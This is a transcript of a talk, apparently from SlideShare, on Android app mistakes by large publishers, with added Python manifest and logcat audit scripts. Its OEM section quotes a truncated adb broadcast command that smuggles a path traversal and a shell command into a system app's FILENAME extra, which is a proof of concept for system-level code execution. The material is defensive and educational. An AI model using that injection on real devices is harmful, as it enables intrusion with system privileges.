PLAY STORE BASHING
LEARN FROM THE BIGGEST FAILS
Eyal LEZMY

SLIDES
http://bit.ly/andbigfails
http://eyal.fr
01 IT ALL STARTS ON THE PLAY STORE

MINIMISE PERMISSIONS

Users should prefer apps requesting the least permissions.
Request only what your app requires: 1/3 of apps request more permissions than they need.

You don't need a permission: use ContentProviders.
A permission is not required to launch another activity that already has that permission.

Need a contact? Use the force, Luke: start the contact app and handle the result.

    // Let the Contacts app do the picking: our app never needs READ_CONTACTS.
    Intent intent = new Intent(Intent.ACTION_GET_CONTENT);
    intent.setType(Phone.CONTENT_ITEM_TYPE);
    startActivityForResult(intent, MY_REQUEST_CODE);

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
        // The picker hands back a content URI our app is allowed to read for this one contact.
        if (requestCode == MY_REQUEST_CODE && resultCode == RESULT_OK && data != null) {
            Uri uri = data.getData();
            if (uri != null) {
                Cursor c = getContentResolver().query(uri,
                        new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER},
                        null, null, null);
            }
        }
    }

Need a UUID?

TelephonyManager.getDeviceId(): requires the READ_PHONE_STATE permission. NO!
Settings.Secure.ANDROID_ID: reset at every wipe, not applicable in a multi-user environment. NO!

Generate your own UUID and use the Backup API! YES!

    String id = UUID.randomUUID().toString();

Android Backup API
· The API is available on all Android devices.
· Manufacturers can implement their own transport and storage for the API.
· Each device has its own backup data.
· A new device will take a backup from a device associated with your Google account.
· IT'S NOT A SYNC API!
02 MICROSOFT STORY EPISODE 1

LOOK AND FEEL

HOTMAIL vs OUTLOOK.COM: SAME!

FOLLOW THE GUIDELINES! http://d.android.com/design

Redesigned by Taylor Ling / By Microsoft

PLEASE! FOLLOW THE GUIDELINES! http://d.android.com/design
03 MICROSOFT STORY EPISODE 2

XBOX MUSIC

Tested on: the emulator (latest devices configuration), Nexus 7, S4, Nexus 10, Note 2, S3, Mega, Galaxy Nexus, Note 1, XCover (Android 2.3), tablets.

In a nutshell:
- Brand new devices (S4, Mega, HTC One, Xperia Z, ...): not compatible
- Tablets (Nexus 7/10, Tab2, Tab3, Note 10.1, ...): not compatible
- Old devices (XCover): not compatible
- Main stream devices (S3, Galaxy Nexus, Note2, Note1, ...): compatible

The dark side of the force, Luke. Let's look into the Manifest:

    <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="14" />

Excludes the old devices. Not recommended (sept. 2013).

    <compatible-screens>
        <screen android:screenSize="small" android:screenDensity="ldpi" />
        <screen android:screenSize="small" android:screenDensity="mdpi" />
        <screen android:screenSize="small" android:screenDensity="hdpi" />
        <screen android:screenSize="small" android:screenDensity="xhdpi" />
        <screen android:screenSize="normal" android:screenDensity="ldpi" />
        <screen android:screenSize="normal" android:screenDensity="mdpi" />
        <screen android:screenSize="normal" android:screenDensity="hdpi" />
        <screen android:screenSize="normal" android:screenDensity="xhdpi" />
    </compatible-screens>

Excludes tablets. Excludes brand new devices (XXHDPI screens). Too restrictive!

About <compatible-screens>: "You should not use this element. It can dramatically reduce the potential user base for your application." "Use it only as a last resort", when the application absolutely does not work with specific screen configurations. "Instead, follow the guide to Supporting Multiple Screens."
<compatible-screens> does not accept xxhdpi, but you can instead specify 480 as the value.

Nothing seems tricky...

XXHDPI: 7.7% of Android devices
Tablets: 11.2% of Android devices
Missing targets: 18.9% of the market

The Mistakes
Have they tested on new devices? Ignoring the power users: brand new devices are bought by power users and early adopters. Does not support preloading music. The app is not perfectly optimized for mobility: why ignore nomad devices like tablets?

Return of the APK
A day after, they updated the app:

    <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="18" />

    <supports-screens
        android:smallScreens="true"
        android:normalScreens="true"
        android:largeScreens="false"
        android:xlargeScreens="false" />

HURRAY!!
04 MICROSOFT STORY EPISODE 3

MICROSOFT OFFICE

Follows the guidelines... this time. Not that bad, but it could be better.

Fight the confusion
The Office 365 offer is quite confusing: people used to buy Office licenses, not subscribe to an Office service. They try to avoid confusion: the title is clear. Is it explicit enough?

Problem: does not support the tablet format. A productivity app has to be compatible with big screen formats.
Microsoft's answer on the Play Store:
- The app is optimized for a phone
- On tablet, you can use the Office Webapps
- We plan to enable editing with Webapps

Other problems
Fewer features than the competitors. Does not support local files. Does not support editing. The backend does not seem very ready: I have been stuck for 24 hours at the mobile activation, and I'm not alone.

Conclusion
Adapt your UI to screen sizes depending on your features. Differentiate your service from competitors, especially when you are new on the market. Your backend has to support your mobile distribution.

One more thing! Check out the Manifest:

    <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16" />
    <uses-permission android:name="android.permission.READ_LOGS"/>

They support ICS+. READ_LOGS: read sensitive log data. It is accepted on 38% of the supported devices; the rest ignore READ_LOGS, since Jelly Bean removed this feature.

Don't do this
Why scare 100% of your users to use a feature with 38% of them? Avoid using deprecated functions as much as possible.
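The two manifest checks the Xbox Music and Office chapters do by hand, automated as an added example (not the deck's code): list every size/density pair a <compatible-screens> whitelist excludes, treating the numeric value 480 as xxhdpi, and flag permissions such as READ_LOGS that only scare users. Assumes Python 3 and its standard library; the manifest is constructed from the fragments on the slides with a placeholder package name.

```python
"""Audit an AndroidManifest.xml for screen-whitelist gaps and pointless scary permissions."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SIZES = ("small", "normal", "large", "xlarge")
DENSITIES = ("ldpi", "mdpi", "hdpi", "xhdpi", "xxhdpi")
# <compatible-screens> does not accept the "xxhdpi" keyword; the numeric value 480 stands for it.
DENSITY_ALIASES = {"ldpi": "ldpi", "mdpi": "mdpi", "hdpi": "hdpi",
                   "xhdpi": "xhdpi", "480": "xxhdpi", "xxhdpi": "xxhdpi"}
# Permissions the deck calls out: READ_LOGS is ignored from Jelly Bean on but still shown to users.
RISKY_PERMISSIONS = {
    "android.permission.READ_LOGS": "reads sensitive log data; no effect from Jelly Bean on",
}

# Constructed manifest combining the Xbox Music <compatible-screens> and the Office READ_LOGS
# fragments (placeholder package name).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.music">
  <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="14" />
  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.READ_LOGS" />
  <compatible-screens>
    <screen android:screenSize="small" android:screenDensity="ldpi" />
    <screen android:screenSize="small" android:screenDensity="mdpi" />
    <screen android:screenSize="small" android:screenDensity="hdpi" />
    <screen android:screenSize="small" android:screenDensity="xhdpi" />
    <screen android:screenSize="normal" android:screenDensity="ldpi" />
    <screen android:screenSize="normal" android:screenDensity="mdpi" />
    <screen android:screenSize="normal" android:screenDensity="hdpi" />
    <screen android:screenSize="normal" android:screenDensity="xhdpi" />
  </compatible-screens>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def declared_screens(manifest_xml):
    """(size, density) pairs whitelisted by <compatible-screens>, or None when the element is
    absent (then the Play Store does not filter on this whitelist at all)."""
    root = ET.fromstring(manifest_xml)
    block = root.find("compatible-screens")
    if block is None:
        return None
    pairs = set()
    for screen in block.findall("screen"):
        density = DENSITY_ALIASES.get(_attr(screen, "screenDensity"), "unknown")
        pairs.add((_attr(screen, "screenSize"), density))
    return pairs


def missing_screens(manifest_xml):
    """Every size/density combination the whitelist keeps out of the store listing."""
    declared = declared_screens(manifest_xml)
    if declared is None:
        return []
    return [(s, d) for s in SIZES for d in DENSITIES if (s, d) not in declared]


def risky_permissions(manifest_xml):
    """Declared permissions from RISKY_PERMISSIONS, with the reason they are a problem."""
    root = ET.fromstring(manifest_xml)
    return [(_attr(p, "name"), RISKY_PERMISSIONS[_attr(p, "name")])
            for p in root.findall("uses-permission")
            if _attr(p, "name") in RISKY_PERMISSIONS]


def report(manifest_xml):
    lines = ["excluded: %s/%s" % pair for pair in missing_screens(manifest_xml)]
    lines += ["permission %s: %s" % item for item in risky_permissions(manifest_xml)]
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_MANIFEST)))
```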
05 YAHOO! WEATHER

YAHOO WEATHER

Beautiful... Very good score. Is it perfect? Hell no!

« Try not. Do. Or do not. There is no try. » YODA

A splashscreen. A non native UI. Where is my status bar?

Hide the status bar for an immersive experience: games, books, videos.
Show the status bar for multitasking: everything else.

When do you check the weather? In the morning?
- Choosing your clothes
- Eating your breakfast
- Checking your emails
- Looking after your kids
This is multitasking!

YouTube is an immersive app with no status bar, yet it allows multitasking inside the app: playing video. Samsung Video Player: Popup play.

You have to think about the context.
06 FACEBOOK EPISODE 1

FACEBOOK

Under the hood, March 2013: too many methods, LinearAlloc buffer overflow. The solution is to divide the code into several dex files and load them on demand.
The Facebook app source code was not modular enough to allow this at application level: "Too many of our classes are accessed directly by the Android framework". They had to do it at system level, thanks to reflection: "We needed to inject our secondary dex files directly into the system class loader".

« More backwards compatibility for Facebook. Another day, another private field accessed. »
Git comment, Android source code, January 2013.

Android source code, DexPathList.java, commit January 2013:

    /**
     * List of dex/resource (class path) elements.
     * Should be called pathElements, but the Facebook app uses reflection
     * to modify 'dexElements' (http://b/7726934).
     */
    private final Element[] dexElements;

Android code review, January 2013, Patch set 2:
"lets facebook start (at least judging by logcat output)"
"After manual testing facebook starts, though i don't have an account."

This was not enough: they finally patched the Dalvik VM, using a native hot fix to change the LinearAlloc buffer size. I feel dirty.

In a nutshell
Modularity saves lives. Google seems to test some popular apps during integration, so they don't break the system apps. Google hires engineers when Facebook hires sculptors (inspired by Sayo Oladeji).
07 FACEBOOK EPISODE 2

FACEBOOK HOME

A lock screen, several services supported, and a launcher.

The problem
The launcher is too simple: no folder, no widget, no dock (during the first months). It used to be mandatory: lockscreen + launcher. Opens the default launcher. Spot the odd one out.

Conclusion
Keep the platform spirit: to override native OS elements you need first to implement all the basic features the user is used to. Identify your weakest points and prepare how to limit their impact.
08 CANAL PLUS

CANAL+ TOUCH

This is the logcat:

    Request: https://canalURL.com/1.5/getThmChannel.php...
    Request: https://canalURL.com/1.5/getProgramThm.php...
    Request: https://canalURL.com/1.4/programRediff.php...
    Request: https://canalURL.com/1.5/VOD.php?release=1...
    json response : {"token":{"url":"http://download....
    Request: https://canalURL.com/1.4/getChannel.php?SE...
    json response: {"token":{"url":"https://canalURL....
    Request: https://canalURL.com/1.5/guideTvChannel.ph...
    Request: https://canalURL.com/1.5/programInfo.php?U...
    Request: https://canalURL.com/1.5/myTv.php?release=...

Chatty logs make reverse engineering easier: HTTPS connection, PHP backend, all the URLs and parameters are known, some of the responses are known too. Chatty logs can bring really big security breaches.

This is still the logcat:

    https://canalURL.com/1.5/authentification.php?login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...

Wait. login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]... WHAT?!

Shut the fuck up!
Control your log output: easy method with BuildConfig.DEBUG. Never send a clear password over the network. NEVAAAAAAA!!!!

    // BuildConfig.DEBUG is false in release builds, so release APKs log nothing through here.
    public static final boolean SHOW_LOG = BuildConfig.DEBUG;

    public static void d(final String tag, final String msg) {
        if (SHOW_LOG) Log.d(tag, msg);
    }

Avoid the leak, easily. And test it during QA.
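The "test it during QA" step as an added example (not from the deck or from Canal+): scan a captured logcat dump for request URLs whose query string carries a password or token, and show the redacted form a debug log may safely contain. Assumes Python 3; the log lines are constructed placeholders in the shape of the slide's output, with invented credentials.

```python
"""QA check: find request URLs in logcat text that leak credentials, and redact them."""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Query parameter names that must never reach a log line.
SENSITIVE_PARAMS = {"pass", "password", "passwd", "pwd", "token", "secret", "apikey"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Constructed logcat excerpt (placeholder host, invented login and password).
SAMPLE_LOGCAT = """\
D/CanalApi ( 1234): Request: https://canalURL.com/1.5/getThmChannel.php?release=1
D/CanalApi ( 1234): Request: https://canalURL.com/1.5/VOD.php?release=1
D/CanalApi ( 1234): Request: https://canalURL.com/1.5/authentification.php?login=alice&pass=hunter2
D/CanalApi ( 1234): json response : {"token":{"url":"http://download.example.invalid/x"}}
D/CanalApi ( 1234): Request: https://canalURL.com/1.5/myTv.php?release=1&token=abcd1234
"""


def sensitive_params(url):
    """Names of sensitive query parameters present in url, in query order."""
    query = urlsplit(url).query
    return [k for k, _ in parse_qsl(query, keep_blank_values=True)
            if k.lower() in SENSITIVE_PARAMS]


def find_credential_leaks(logcat_text):
    """One finding per log line containing a URL with at least one sensitive parameter."""
    findings = []
    for lineno, line in enumerate(logcat_text.splitlines(), start=1):
        for url in URL_RE.findall(line):
            hits = sensitive_params(url)
            if hits:
                findings.append({"line": lineno, "path": urlsplit(url).path, "params": hits})
    return findings


def redact_url(url):
    """Same URL with sensitive values replaced: what a debug log may contain instead."""
    parts = urlsplit(url)
    pairs = [(k, "REDACTED" if k.lower() in SENSITIVE_PARAMS else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(pairs), parts.fragment))


if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_LOGCAT):
        print("line %d: %s leaks %s" % (f["line"], f["path"], ", ".join(f["params"])))
```

Feed it the output of `adb logcat -d` from a release build during QA: any finding means the SHOW_LOG guard is missing somewhere, or the app is sending credentials in a query string at all.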
09 OEM SOFTWARE

OEM SOFTWARE

The Android framework: many APKs implement the features, and they often have system access to use low level features. Open bar? Let's see.

"Android OEM applications (in)security", talk by ANDRE MOULU, Quarkslab.

Methodology
Reverse engineering using Androguard, a custom result environment, manifest analysis, check for sensitive API usage, diff between OS versions (to find patches).

The results on Samsung devices
12 vulnerabilities found: leak personal information, access non-permitted features, silent SMS control, code injection, ... Similar vulnerabilities on many manufacturers.

Gimme more!
Search for sharedUserId = system (sensitive user ID) and command execution (sensitive usage). Find serviceModeApp.apk = very sensitive app!

    <receiver name=".FTATDumpReceiver">
        <intent-filter>
            <action name="com.android.sec.FTAT_DUMP"></action>
        </intent-filter>
    </receiver>
    <receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING">
        <intent-filter>
            <action name="com.android.sec.FAILDUMP"></action>
        </intent-filter>
    </receiver>

Receiver declared twice. A permission is asked for the FAILDUMP action; no permission needed for the FTAT_DUMP action!!

We read the FTATDumpReceiver source code. It intercepts the FTAT_DUMP action:

    public void onReceive(Context paramContext, Intent paramIntent) {
        String str1 = paramIntent.getAction();
        if (str1.equals("com.android.sec.FTAT_DUMP")) {
            String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
            [...]
            String str9 = str8 + [...]
            Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);
            localIntent2.putExtra("FILENAME", str9);
            paramContext.startService(localIntent2);
        }
        [...]
    }

    public int onStartCommand(Intent paramIntent, ...){
        final String str = paramIntent.getStringExtra("FILENAME"...

    private boolean DoShellCmd(String paramString){
        [...]
        String[] arrayOfString = new String[3];
        arrayOfString[...

Access to: all permissions declared by system apps (156 for this case); all files belonging to the system user; Wif...

    $ adb shell am broadcast -a com.android.sec.FTAT_DUMP
        --es FILENAME '../../../../../dev/null;
        /system/bin/pm...

Open bar!

Moral of the story
It happens at application level. Look after your app's backdoors. Don't export local servi...
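The manifest-analysis step of the methodology above, as an added example (not the deck's code and not Quarkslab's tooling): list components that any installed app can reach (exported) while declaring no android:permission, and raise the severity when the package shares the system user ID, which is exactly the serviceModeApp pattern. Assumes Python 3 and the pre-Android-12 default that a component with an <intent-filter> is exported; the manifest is constructed with placeholder package and permission names.

```python
"""Manifest triage: exported components with no permission guard, plus shared system uid."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed manifest modelled on the slide's double FTATDumpReceiver declaration
# (placeholder package and permission names).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.oem.servicemode" android:sharedUserId="android.uid.system">
  <application>
    <receiver android:name=".FTATDumpReceiver">
      <intent-filter>
        <action android:name="com.android.sec.FTAT_DUMP" />
      </intent-filter>
    </receiver>
    <receiver android:name=".FTATDumpReceiver"
        android:permission="com.example.oem.servicemode.permission.KEYSTRING">
      <intent-filter>
        <action android:name="com.android.sec.FAILDUMP" />
      </intent-filter>
    </receiver>
    <service android:name=".FTATDumpService" />
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """An explicit android:exported wins; otherwise a component with an <intent-filter>
    is exported and one without stays private to the app (pre-Android-12 default)."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit == "true"
    return component.find("intent-filter") is not None


def filtered_actions(component):
    """Actions the component's intent filters respond to."""
    return [_attr(a, "name") for f in component.findall("intent-filter")
            for a in f.findall("action")]


def shared_user_id(manifest_xml):
    return _attr(ET.fromstring(manifest_xml), "sharedUserId")


def unguarded_exported_components(manifest_xml):
    """Components any installed app can reach and that declare no android:permission."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for tag in COMPONENT_TAGS:
        for comp in root.iter(tag):
            if is_exported(comp) and _attr(comp, "permission") is None:
                findings.append({"kind": tag, "name": _attr(comp, "name"),
                                 "actions": filtered_actions(comp)})
    return findings


def report(manifest_xml):
    """Human-readable findings; a system uid turns every finding into a system-level hole."""
    severity = "SYSTEM" if shared_user_id(manifest_xml) == "android.uid.system" else "app"
    return ["[%s] %s %s handles %s with no permission"
            % (severity, f["kind"], f["name"], ", ".join(f["actions"]) or "explicit intents")
            for f in unguarded_exported_components(manifest_xml)]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_MANIFEST)))
```

The same check on a manifest where the first receiver carries android:exported="false" reports nothing, which is the "don't export" fix the moral of the story asks for.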
Thank you for your time!

SLIDES
http://bit.ly/andbigfails
http://eyal.fr
Slides with speaker notes can be found here: http://bit.ly/andbigfails

Microsoft, Facebook, Yahoo, ... They are huge firms that are also big Android editors. During this presentation we will discover together the stories of big editors that published apps on the Play Store (or not) that failed to satisfy the users or the Android guidelines, to learn from their mistakes.

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
498
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
9
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

PlayStore bashing: learn from the biggest fails on the Google Play Store

  1. 1. PLAY STORE BASHING LEARN FROM THE BIGGEST FAILS
  2. 2. Eyal LEZMY SLIDES http://bit.ly/andbigfails http://eyal.fr
  3. 3. 01 IT ALL STARTS ON THE PLAY STORE
  4. 4. MINIMISE PERMISSIONS Users should prefer apps requesting the least permissions Request only what your app requires 1/3 of apps request more permissions than they need
  5. 5. MINIMISE PERMISSIONS Users should prefer apps requesting the least permissions You don’t need permission Use ContentProviders
  6. 6. MINIMISE PERMISSIONS Permission are not required to launch another activity that has the permission
  7. 7. MINIMISE PERMISSIONS Need a contact?
  8. 8. MINIMISE PERMISSIONS Use the force, Luke
  9. 9. MINIMISE PERMISSIONS Start the contact app Intent intent = new Intent(Intent.ACTION_GET_CONTENT); intent.setType(Phone.CONTENT_ITEM_TYPE); startActivityForResult(intent, MY_REQUEST_CODE); void onActivityResult(int requestCode, int resultCode, Intent data) { if (data != null) { Uri uri = data.getData(); if (uri != null) { Cursor c = getContentResolver().query(uri, new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);} } } }
  10. 10. MINIMISE PERMISSIONS Start the contact app Intent intent = new Intent(Intent.ACTION_GET_CONTENT); intent.setType(Phone.CONTENT_ITEM_TYPE); startActivityForResult(intent, MY_REQUEST_CODE); void onActivityResult(int requestCode, int resultCode, Intent data) { if (data != null) { Uri uri = data.getData(); if (uri != null) { Cursor c = getContentResolver().query(uri, new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);} } } } Handle the result
  11. 11. MINIMISE PERMISSIONS Need an UUID?
  12. 12. MINIMISE PERMISSIONS Need an UUID? TelephonyManager.getDeviceId() Requires READ_PHONE_STATE permission
  13. 13. MINIMISE PERMISSIONS Need an UUID? TelephonyManager.getDeviceId() Requires READ_PHONE_STATE permission Settings.Secure.ANDROID_ID Reset at every wipe Not applicable on multi user environment
  14. 14. MINIMISE PERMISSIONS Need an UUID? TelephonyManager.getDeviceId() Requires READ_PHONE_STATE permission Settings.Secure.ANDROID_ID Reset at every wipe Not applicable on multi user environment NO!
  15. 15. MINIMISE PERMISSIONS Need an UUID? Generate your own UUID and use Backup API ! String id = UUID.randomUUID(). toString();
  16. 16. MINIMISE PERMISSIONS Need an UUID? Generate your own UUID and use Backup API ! String id = UUID.randomUUID(). toString(); YES!
  17. 17. MINIMISE PERMISSIONS Android Backup API · API is available on all Android devices. · Manufacturors can implements their own transport and storage for the API · Each device as its own backup data · A new device will take a backup from a device associated with your google account. · IT'S NOT A SYNC API !
  18. 18. 02 MICROSOFT STORY EPISODE 1
  19. 19. ? ? ?
  20. 20. LOOK AND FEEL HOTMAIL OUTLOOK.COM
  21. 21. LOOK AND FEEL SAME! HOTMAIL OUTLOOK.COM
  22. 22. LOOK AND FEEL FOLLOW THE GUIDELINES! http://d.android.com/design
  23. 23. LOOK AND FEEL Redesigned by Taylor Ling
  24. 24. LOOK AND FEEL By Microsoft
  25. 25. LOOK AND FEEL
  26. 26. LOOK AND FEEL
  27. 27. LOOK AND FEEL FOLLOW THE GUIDELINES! http://d.android.com/design
  28. 28. LOOK AND FEEL PLEASE! FOLLOW THE GUIDELINES! http://d.android.com/design
  29. 29. 03 MICROSOFT STORY EPISODE 2
  30. 30. XBOX MUSIC
  31. 31. XBOX MUSIC Emulator (last devices configuration)
  32. 32. XBOX MUSIC Emulator (last devices configuration) Nexus 7 S4 Nexus 10 Mega
  33. 33. XBOX MUSIC Emulator (last devices configuration) Nexus 7 S4 Nexus 10 Mega XCover (Android 2.3)
  34. 34. XBOX MUSIC Emulator (last devices configuration) Nexus 7 S4 Nexus 10 Mega XCover (Android 2.3) Tablets
  35. 35. XBOX MUSIC Emulator (last devices configuration) Nexus 7 S4 Nexus 10 Note 2 S3 Mega Galaxy Nexus Note 1 XCover (Android 2.3) Tablets
  36. 36. XBOX MUSIC Brand New devices Our Nutshell S4, Mega, HTC One, Xperia Z, ... Tablets Nexus 7/10, Tab2, Tab3, Note 10.1, … Old devices XCover Not compatible
  37. 37. XBOX MUSIC Main stream devices Our Nutshell S3, Galaxy Nexus, Note2, Note1, ... Compatible
  38. 38. XBOX MUSIC The dark side of the force, Luke
  39. 39. XBOX MUSIC Let’s look into the Manifest
  40. 40. XBOX MUSIC <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 14" />
  41. 41. XBOX MUSIC Exclude the old devices <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 14" />
  42. 42. XBOX MUSIC Exclude the old devices <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 14" /> Not recommended (sept. 2013)
  43. 43. XBOX MUSIC <compatible-screens> <screen android:screenSize="small" android:screenDensity="ldpi" /> <screen android:screenSize="small" android:screenDensity="mdpi" /> <screen android:screenSize="small" android:screenDensity="hdpi" /> <screen android:screenSize="small" android:screenDensity="xhdpi" /> <screen android:screenSize="normal" android:screenDensity="ldpi" /> <screen android:screenSize="normal" android:screenDensity="mdpi" /> <screen android:screenSize="normal" android:screenDensity="hdpi" /> <screen android:screenSize="normal" android:screenDensity="xhdpi" /> </compatible-screens>
  44. 44. XBOX MUSIC <compatible-screens> <screen android:screenSize="small" android:screenDensity="ldpi" /> <screen android:screenSize="small" android:screenDensity="mdpi" /> <screen android:screenSize="small" android:screenDensity="hdpi" /> <screen android:screenSize="small" android:screenDensity="xhdpi" /> <screen android:screenSize="normal" android:screenDensity="ldpi" /> <screen android:screenSize="normal" android:screenDensity="mdpi" /> <screen android:screenSize="normal" android:screenDensity="hdpi" /> <screen android:screenSize="normal" android:screenDensity="xhdpi" /> </compatible-screens> Exclude tablets
  45. 45. XBOX MUSIC <compatible-screens> <screen android:screenSize="small" android:screenDensity="ldpi" /> <screen android:screenSize="small" android:screenDensity="mdpi" /> <screen android:screenSize="small" android:screenDensity="hdpi" /> <screen android:screenSize="small" android:screenDensity="xhdpi" /> <screen android:screenSize="normal" android:screenDensity="ldpi" /> <screen android:screenSize="normal" android:screenDensity="mdpi" /> <screen android:screenSize="normal" android:screenDensity="hdpi" /> <screen android:screenSize="normal" android:screenDensity="xhdpi" /> </compatible-screens> Exclude tablets Exclude brand new devices (XXHDPI screens)
  46. 46. XBOX MUSIC <compatible-screens> <screen android:screenSize="small" android:screenDensity="ldpi" /> <screen android:screenSize="small" android:screenDensity="mdpi" /> <screen android:screenSize="small" android:screenDensity="hdpi" /> <screen android:screenSize="small" android:screenDensity="xhdpi" /> <screen android:screenSize="normal" android:screenDensity="ldpi" /> <screen android:screenSize="normal" android:screenDensity="mdpi" /> <screen android:screenSize="normal" android:screenDensity="hdpi" /> <screen android:screenSize="normal" android:screenDensity="xhdpi" /> </compatible-screens> Exclude tablets Exclude brand new devices (XXHDPI screens) Too restrictive!
  47. 47. XBOX MUSIC < > “You should not use this element” It can dramatically reduce the potential user base for your application compatible-screens “Use it only as a last resort” When the application absolutely does not work with specific screen configurations “Instead, follow the guide to Supporting Multiple Screens”
  48. 48. XBOX MUSIC < > compatible-screens It does not accept xxhdpi But you can instead specify 480 as the value
  49. 49. XBOX MUSIC Nothing seems tricky...
  50. 50. XBOX MUSIC XXHDPI 7.7% of Android devices XXHDPI
  51. 51. XBOX MUSIC Tablets 11.2% of Android devices XXHDPI
  52. 52. XBOX MUSIC Missing targets 18,9% of the market XXHDPI
  53. 53. XBOX MUSIC The Mistakes Have they tested on new devices? Ignoring the power users Brand new devices are bought by power users and early adopters Does not support preloading music The app is not prefectly opimized for mobility. Why ignoring nomad devices like tablets?
  54. 54. XBOX MUSIC Return of the APK
  55. 55. XBOX MUSIC A day after
  56. 56. XBOX MUSIC A day after They updated the app
  57. 57. XBOX MUSIC <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 18" /> <supports-screens android:smallScreens="true" android:normalScreens="true" android:largeScreens="false" android:xlargeScreens="false" />
  58. 58. XBOX MUSIC <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 18" /> <supports-screens android:smallScreens="true" HURRAY android:xlargeScreens="false" /> !! android:normalScreens="true" android:largeScreens="false"
  59. 59. 04 MICROSOFT STORY EPISODE 3
  60. 60. MICROSOFT OFFICE Follows the guidelines… This time
  61. 61. MICROSOFT OFFICE Not that bad But it could be better
  62. 62. MICROSOFT OFFICE Fight the confusion Office 365 offer is quite confusing People used to buy Office licenses, not to subscribe to an Office service They try to avoid confusion
  63. 63. MICROSOFT OFFICE
  64. 64. MICROSOFT OFFICE The title is clear
  65. 65. MICROSOFT OFFICE Is it enough explicit?
  66. 66. MICROSOFT OFFICE Does not support tablet format Problem A producting app has to be compatible with big screens formats
  67. 67. MICROSOFT OFFICE Does not support tablet format Problem A producting app has to be compatible with big screens formats - The app is optimized for a phone - On tablet, you can use the Office Webapps - We plan to enable editing with Webapps Microsoft’s answer on PlayStore
  68. 68. MICROSOFT OFFICE Other problems Less features than the competitors Does not support local files Does not support edition The backend seems not very ready I have been stuck during 24 hours at the mobile activation, and I’m not alone
  69. 69. MICROSOFT OFFICE Adapt your UI to screen sizes depending on your features Conclusion Differenciate your service from competitors Especially when you are new on the market Your backend have to support your mobile distribution
  70. 70. MICROSOFT OFFICE One more thing!
  71. 71. MICROSOFT OFFICE Check out the Manifest
  72. 72. MICROSOFT OFFICE <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16" /> <uses-permission android:name="android.permission.READ_LOGS"/>
  73. 73. MICROSOFT OFFICE <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16" /> They support ICS+ <uses-permission android:name="android.permission.READ_LOGS"/>
  74. 74. MICROSOFT OFFICE <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16" /> They support ICS+ <uses-permission android:name="android.permission.READ_LOGS"/> Read sensitive log data
  75. 75. MICROSOFT OFFICE Accepts READ_LOGS 38% of the supported devices XXHDPI Ignore READ_LOGS Jelly Bean removed this feature
  76. 76. MICROSOFT OFFICE Don’t do this Why scaring 100% of your users? To use a feature with 38% of them Avoid using deprecated functions As much as possible
  77. 77. 05 YAHOO! WEATHER
  78. 78. YAHOO WEATHER Beautiful...
  79. 79. YAHOO WEATHER Very good score
  80. 80. YAHOO WEATHER Is it perfect? Hell no!
  81. 81. YAHOO WEATHER « Try not. Do. Or do not. There is no try. »
  82. 82. YAHOO WEATHER « Try not. Do. Or do not. There is no try. » YODA
  83. 83. YAHOO WEATHER A splashscreen
  84. 84. YAHOO WEATHER Non native UI
  85. 85. YAHOO WEATHER Non native UI
  86. 86. YAHOO WEATHER Where is my status bar?
  87. 87. YAHOO WEATHER Hide status bar Show status bar Immersive experience Multitasking Games, Books, Videos Everything else
  88. 88. YAHOO WEATHER When do you check the weather? Morning? - Choosing your clothes - Eating your breakfast - Checking your emails - Looking after your kids
  89. 89. YAHOO WEATHER When do you check the weather? Morning? - Choosing your clothes - Eating your breakfast - Checking your emails - Looking after your kids This is multitasking!
  90. 90. YAHOO WEATHER Youtube An immersive app No status bar
  91. 91. YAHOO WEATHER It allows multitasking Inside the app Playing video
  92. 92. YAHOO WEATHER Samsung Video Player
  93. 93. YAHOO WEATHER Samsung Video Player Popup play
  94. 94. YAHOO WEATHER About the context you have to think
  95. 95. 06 FACEBOOK EPISODE 1
